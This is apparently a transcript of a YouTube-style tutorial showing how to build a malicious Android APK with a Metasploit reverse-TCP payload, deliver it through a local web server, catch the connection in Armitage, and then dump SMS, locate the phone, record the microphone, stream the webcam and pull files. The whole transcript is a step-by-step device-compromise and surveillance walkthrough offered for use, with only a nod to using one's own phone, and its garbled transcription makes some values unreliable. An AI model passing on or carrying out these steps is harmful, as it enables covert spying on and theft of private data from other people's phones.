Hello guys, this is How To Tutorials, and today I'm going to be showing you how to use Metasploit to hack into your Android device and execute some commands through the shell. So the first thing you want to do is log in as your root user using the SU, and we want to make sure the services for the SQL server is running. So we'll type that. Wait for that to start. Yep. And then we want to start Metasploit service, so that's all should be running fine. Yep, that's all working. So the next thing we want to do is use Armitage. You can use the MSF console like this and then just press enter, but for the purpose of this video we're going to be using Armitage because it's got a nice interface for it. So wait for that to load and use the default settings and connect. Just wait for that. If it's your first time, it will say connection refused for quite a while, then it'll connect with no problems at all, so just wait for that. Oh, there we go. And here we go. This is the Armitage window, and I'm going to add the host. Oh no, it's already here. This is the IP address of the phone. If you don't know the IP address, you can always do a quick scan OS detect, and this will go through your whole network and search for devices, and then if it's your Android device it should look like this. Or if you're not too sure on the IP address, you can always go into the phone, go to the Wi-Fi settings and get the IP address that way. But the first thing we want to do is create the APK file that we're going to be running on the phone. So we want to do MSF payload and then type Android interpreter reverse TCP, and the local host is the IP of the machine. So if you're not too sure of that, you can always go into your another window and type ifconfig, and for this purpose it's going to be 192.168.0.7. so we'll do that. 192.160.07, and the port we're going to set that as we'll say it's 442 R, and then we want to do a greater than sign. I'm going to put it in the Apache folder so you can easily get it onto the phone. So we'll try that android1.apk. hopefully that should work. Should be no problem there. Yep, that's worked. We can see if it's worked by going to we're going to have to be cd var, and we've got the Android 1 APK. So what you want to do is go over to your phone now, and I'll show you how to do that, and visit the IP address of this machine. But first, just make sure the Apache 2 server is running. This is one way of doing it. You can always use Dropbox and get it onto the phone that way, but I'm just going to use the Apache server because it's easier at the moment. Okay, so what we want to do here is open your browser and visit the URL of the system we've just been on. So in my case it's 192.168.0.7, so we'll just type that in, and you want to download the file which we made, which is the android1.apk. so get that downloaded and then install the file, and then we'll wait to open it till the next step of the video. What you want to do now is, once the APK is loaded onto the phone, you want to set the multi-handler, so use multi-handler like that. And then if it's working, you'll see at the bottom here, it'll be in the brackets there. And the next thing you want to do is set the payload to Android interpreter and reverse. It's called TCP. That's all set, and we want to do show options, so we can see the options of the interpreter payload. And the local host is already set correct. Make sure the local host is set to the machine you're on now, because you're going to be doing a reverse TCP. So we'll set it again just to be on the safe side. And the local port was what we set earlier, so set local port as 442, and that's all good to go. So open your phone now and we'll type exploit first. So now we're listening and waiting for a connection on the phone. So if we go onto the phone, and if I press the payload, the APK we created earlier, that's it, it's exploited. We've got the interpreter shell running on there and a command shell if we want to. We've got all these options. We can browse the files, show processes, screenshot. Let's see the screenshot. So if we type help, it'll give us a list of all the commands we can do. The interesting ones are towards the bottom, so we can check if it's root. We can check if the device is rooted, so my phone's rooted, and we can do stuff like dump SMS. I'm not going to type geolocate, but you could type geolocate and then it'll come up with a URL of Google Maps and the longitude and latitude. We can record the mic, and we can start a webcam stream. So if you do that, it'll load up into your browser and you can sit there and watch the camera on the phone. What else can we do? So we'll CD to the root, and then we'll CD to the SD card and LS, and we can see all the files here. And I think there's a command to actually download. So if we download, let's download something. What should we download? Log.txt. And there we go. That'll go into the Armitage folder, and you can find the Armitage folder. I do believe it's at user, share, and then Armitage, and you should see all the downloaded files there. In fact, I do believe they have. It usually saves it all here. Of all the goodies, what you've got. Workspaces, view. I think it's in the loot. Okay, that's a recording I did earlier. But as you can see, you can do quite a lot under here. You can pretty much do anything you could do as root on a normal Linux system. Most of the commands work. So yeah, I hope this helped. And if you have any questions, then feel free to put them on the comment list on the comments, and I'll get back to you and try and help you as much as I can. And as always, please like and subscribe, because that helps a lot. And thanks for watching.